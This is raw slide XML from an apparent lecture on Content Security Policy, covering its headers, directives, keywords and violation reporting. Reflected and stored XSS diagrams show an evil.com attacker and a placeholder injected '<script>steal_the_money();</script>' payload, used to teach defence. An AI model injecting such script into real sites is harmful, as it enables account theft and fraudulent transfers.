              <a:t>Policies are composed of directives scoped to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>origins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Header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2090"/>
            <a:ext cx="10775302" cy="33559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CSP implements two headers that a server may include in HTTP responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Content-Security-Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Content-Security-Policy-Report-Only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSP header composed of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directives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origins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keywords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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If CSP header is present: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rowser switches to whitelist-only mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inline JS and CSS are disallowed by default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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() and similar functions are disallowed by default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054933"/>
            <a:ext cx="10515600" cy="2213325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E28964"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK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28964"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>text/html; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>charset=utf-8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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pr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Content-Security-Policy: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default-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https://www.example.com; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="89BDFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="89BDFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>src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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="65B042"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>'self'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	https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://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apis.google.com;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frame-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'none'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;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object-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'none'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; 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="89BDFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>report-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="89BDFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>uri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 	/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>my_amazing_csp_report_parser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;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="200" dirty="0"/>
              <a:t> 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192555" y="773384"/>
            <a:ext cx="1455576" cy="548429"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20627"/>
              <a:gd name="adj2" fmla="val 176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Directive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5844073" y="773383"/>
            <a:ext cx="1203649" cy="548429"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20627"/>
              <a:gd name="adj2" fmla="val 176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Origin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9002486" y="769215"/>
            <a:ext cx="1454020" cy="548429"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20627"/>
              <a:gd name="adj2" fmla="val 176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Keyword</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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10636898" y="2245698"/>
            <a:ext cx="1208314" cy="548429"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -122043"/>
              <a:gd name="adj2" fmla="val -4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28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8"/>
            <a:ext cx="10887269" cy="534468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irectives allow the server to restrict the origins of resources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script-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dirty="0" smtClean="0"/>
              <a:t> sets the origins from which scripts may be loaded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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connect-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dirty="0" smtClean="0"/>
              <a:t> sets restrictions on XHR, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebsockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>EventSource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object-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i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>restriction plugins, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>media-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dirty="0" smtClean="0"/>
              <a:t> restricts audio and video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style-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font-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i="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img-src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frame-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endParaRPr lang="en-US" i="1" dirty="0" smtClean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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>default-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dirty="0" smtClean="0"/>
              <a:t> is the catch all directive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defines allowed origins for all unspecified source types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All accesses that violate the restrictions are blocked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Warning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: whitelist mode is only enabled for a given type of resource if:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The corresponding directive is specified, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>or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default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is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4065"/>
            <a:ext cx="10515600" cy="3928583"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hostname/IP address pattern with optional scheme and port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trusted.com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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://*.sensitive.com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670485"/>
            <a:ext cx="10515600" cy="982219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Content-Security-Policy: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default-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  http://www.example.com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  trusted.com 	https://*.sensitive.com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Attacks, Revisited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1" y="3583240"/>
            <a:ext cx="747017" cy="747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8746" y="6192896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evil.com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5" y="5525559"/>
            <a:ext cx="663949" cy="663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76" y="5313632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56" y="2044600"/>
            <a:ext cx="925339" cy="925339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1530140" y="4330257"/>
            <a:ext cx="5400" cy="582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67258" y="3856123"/>
            <a:ext cx="1233539" cy="13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67258" y="4204310"/>
            <a:ext cx="10993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1" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1535540" y="2969939"/>
            <a:ext cx="9186" cy="613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659645" y="3277260"/>
            <a:ext cx="2476610" cy="1738338"/>
            <a:chOff x="7938083" y="2817346"/>
            <a:chExt cx="2476610" cy="17383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938083" y="3909353"/>
              <a:ext cx="234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</a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>CSP: default-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                <a:t>bofw.com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38083" y="2817346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974303" y="2861474"/>
              <a:ext cx="440390" cy="236506"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Multiply 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025318" y="4323562"/>
            <a:ext cx="1020441" cy="10204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70342" y="1668134"/>
            <a:ext cx="19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Reflected XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" u="sng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2" y="3583240"/>
            <a:ext cx="747017" cy="7470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57" y="2044600"/>
            <a:ext cx="925339" cy="925339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7637637" y="3798015"/>
            <a:ext cx="1233539" cy="13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648509" y="4012097"/>
            <a:ext cx="1222667" cy="6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2"/>
            <a:endCxn id="59" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7031741" y="2969939"/>
            <a:ext cx="9186" cy="613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8155846" y="3277260"/>
            <a:ext cx="2476610" cy="1738338"/>
            <a:chOff x="7938083" y="2817346"/>
            <a:chExt cx="2476610" cy="173833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7938083" y="3909353"/>
              <a:ext cx="234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</a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>CSP: default-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                <a:t>bofw.com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38083" y="2817346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974303" y="2861474"/>
              <a:ext cx="440390" cy="236506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7766543" y="1668134"/>
            <a:ext cx="15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Stored XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="76" name="Curved Connector 75"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="63" idx="3"/>
            <a:endCxn id="71" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503596" y="2507270"/>
            <a:ext cx="1702678" cy="769990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637636" y="4220082"/>
            <a:ext cx="1233539" cy="130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ular Callout 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6136796" y="5498412"/>
            <a:ext cx="3731715" cy="611781"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3958"/>
              <a:gd name="adj2" fmla="val -22467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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xfer_money.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Rectangular Callout 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9469221" y="1873557"/>
            <a:ext cx="2606428" cy="1120010"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67487"/>
              <a:gd name="adj2" fmla="val 313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&lt;script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steal_the_money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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="126058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0" grpId="0" animBg="1"/>
      <p:bldP spid="8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Scripts Considered Harmful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961914" cy="4967061"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: even with CSP enabled, stored XSS attacks may still interact with the origin the page was loaded from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Insight: stored XSS attacks rely on inline scripts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/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>steal_the_money</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>();&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When CSP is enabled by a server, the browser’s default behavior changes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Inline JS and CSS are disallowed by default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eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setTimeout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“string”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, …), and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setInterval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“string”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, …) are disallowed by default</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237848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1803" y="2755224"/>
            <a:ext cx="10636898" cy="1289996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AEAEAE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;!-- amazing.html --&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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&lt;script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=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'amazing.js'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&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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&lt;button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</a:rPr>
              <a:t>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=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'amazing'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&gt;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Am I amazing?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&lt;/button&gt;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1803" y="131888"/>
            <a:ext cx="10636898" cy="2213325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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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	function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doAmazingThings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alert(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'YOU AM AMAZING!'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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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  <a:tab pos="1374775" algn="l"/>
                <a:tab pos="18288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&lt;button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</a:rPr>
              <a:t>onclick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=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doAmazingThings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();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&gt;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Am I amazing?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&lt;/button&gt;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1803" y="4223271"/>
            <a:ext cx="10636898" cy="2521102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AEAEAE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>// amazing.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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function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doAmazingThings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alert(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'YOU AM AMAZING!'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document.addEventListener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DOMContentReady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function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() { 	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document.getElementById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'amazing'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) .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addEventListener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'click'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doAmazingThings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});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417836" y="512127"/>
            <a:ext cx="3579845" cy="918568"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61635"/>
              <a:gd name="adj2" fmla="val -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allowed by default if CSP is enabled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4105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 Attacks, Round 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1" y="3583240"/>
            <a:ext cx="747017" cy="747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8746" y="6192896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evil.com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5" y="5525559"/>
            <a:ext cx="663949" cy="663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76" y="5313632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56" y="2044600"/>
            <a:ext cx="925339" cy="925339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1530140" y="4330257"/>
            <a:ext cx="5400" cy="582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67258" y="3856123"/>
            <a:ext cx="1233539" cy="13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67258" y="4204310"/>
            <a:ext cx="10993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1" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1535540" y="2969939"/>
            <a:ext cx="9186" cy="613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659645" y="3277260"/>
            <a:ext cx="2476610" cy="1738338"/>
            <a:chOff x="7938083" y="2817346"/>
            <a:chExt cx="2476610" cy="17383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938083" y="3909353"/>
              <a:ext cx="234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</a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>CSP: default-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                <a:t>bofw.com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38083" y="2817346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974303" y="2861474"/>
              <a:ext cx="440390" cy="236506"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Multiply 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025318" y="4323562"/>
            <a:ext cx="1020441" cy="10204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70342" y="1668134"/>
            <a:ext cx="19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Reflected XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" u="sng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2" y="3583240"/>
            <a:ext cx="747017" cy="7470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57" y="2044600"/>
            <a:ext cx="925339" cy="925339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7637637" y="3798015"/>
            <a:ext cx="1233539" cy="13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648509" y="4012097"/>
            <a:ext cx="1222667" cy="6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2"/>
            <a:endCxn id="59" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7031741" y="2969939"/>
            <a:ext cx="9186" cy="613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8155846" y="3277260"/>
            <a:ext cx="2476610" cy="1738338"/>
            <a:chOff x="7938083" y="2817346"/>
            <a:chExt cx="2476610" cy="173833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7938083" y="3909353"/>
              <a:ext cx="234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</a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>CSP: default-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                <a:t>bofw.com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38083" y="2817346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974303" y="2861474"/>
              <a:ext cx="440390" cy="236506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7766543" y="1668134"/>
            <a:ext cx="15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Stored XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="76" name="Curved Connector 75"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="63" idx="3"/>
            <a:endCxn id="71" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503596" y="2507270"/>
            <a:ext cx="1702678" cy="769990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637636" y="4276064"/>
            <a:ext cx="5182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9469221" y="1873557"/>
            <a:ext cx="2606428" cy="1120010"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67487"/>
              <a:gd name="adj2" fmla="val 313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&lt;script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steal_the_money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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Multiply 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7766543" y="3978615"/>
            <a:ext cx="646290" cy="6462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keywords may be used in addition to origins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‘none’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Disallow all accesses for the given directive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‘self’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Allow accesses to the origin the page was loaded from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‘unsafe-inline’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: allow inline JS and CSS from the given directive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‘unsafe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(), etc. from the given directive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144"/>
            <a:ext cx="10515600" cy="1542660"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When a policy violation occurs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The offending action is blocked…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>… and (optionally), the violation is reported to a URL specified by the server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321813"/>
            <a:ext cx="10515600" cy="67444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Content-Security-Policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="89BDFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>report-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="89BDFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>uri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   /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>my_amazing_csp_report_parser</a:t>
            </a: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;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="200" dirty="0"/>
              <a:t> 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898039"/>
            <a:ext cx="10515600" cy="2828879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{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csp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-report"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"document-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"http://example.org/page.html"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"referrer"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"http://evil.example.com/"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"blocked-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"http://evil.example.com/evil.js"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"violated-directive"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"script-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 'self' https://apis.google.com"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lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"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"original-policy"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"script-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 'self' https://apis.google.com; report-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 					http://example.org/my_amazing_csp_report_parser"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  <a:tab pos="914400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}}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838200" y="204488"/>
            <a:ext cx="10515600" cy="9743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HTTP Messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
